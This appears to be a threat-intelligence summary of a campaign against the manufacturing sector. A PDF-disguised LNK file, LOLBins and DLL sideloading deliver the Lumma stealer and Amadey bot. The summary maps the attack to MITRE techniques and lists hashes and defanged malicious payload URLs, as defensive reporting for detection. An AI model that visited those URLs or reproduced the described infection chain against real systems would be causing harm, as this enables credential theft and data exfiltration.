Summary:
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
Keypoints:
- Cyble Research and Intelligence Labs (CRIL) discovered a malicious campaign targeting the manufacturing industry.
- The attack uses a deceptive LNK file disguised as a PDF to initiate infection.
- Multiple Living-off-the-Land Binaries (LOLBins) are employed to bypass security mechanisms.
- Google Accelerated Mobile Pages (AMP) URLs are utilized to evade detection.
- File injection techniques are heavily relied upon to execute malicious payloads in memory.
- The attack chain includes DLL sideloading and the use of IDATLoader to deploy Lumma stealer and Amadey bot.
- The initial infection vector is suspected to be a spear-phishing email.
- Malicious PowerShell commands are executed to fetch and run additional payloads from remote servers.
- The campaign demonstrates increasing sophistication in cyberattack methodologies.
MITRE Techniques
- Phishing (T1566): The LNK file may be delivered through phishing or spam emails.
- User Execution: Malicious Link (T1204.001): Execution begins when a user executes the LNK file.
- Command and Scripting Interpreter: PowerShell (T1059.001): The LNK file executes PowerShell commands.
- Masquerading: Masquerade File Type (T1036.008): Uses LNK files with altered icons to disguise as legitimate.
- System Binary Proxy Execution: Mshta (T1218.005): Abuse mshta.exe to proxy execution of malicious files.
- Obfuscated Files or Information (T1027): Scripts include packed or encrypted data.
- System Binary Proxy Execution: Msiexec (T1218.007): msiexec.exe used for proxy execution of malicious payloads.
- DLL Side-Loading (T1574.002): Malicious DLL sideloaded.
- Process Injection (T1055): Injects malicious content into explorer.exe and other processes.
- Scheduled Task/Job (T1053.005): Adds task scheduler entry for persistence.
- Application Layer Protocol (T1071): Malware communicates to the C&C server.
- Automated Exfiltration (T1020): Data is exfiltrated after collection.
IoC:
- [SHA-256] 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36
- [SHA-256] 8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8
- [SHA-256] 7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4
- [SHA-256] dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250
- [URL] hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP
- [URL] hxxps://pastebin[.]com/raw/0v6Vhvpb
- [URL] hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl
- [URL] hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/
Full Research: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/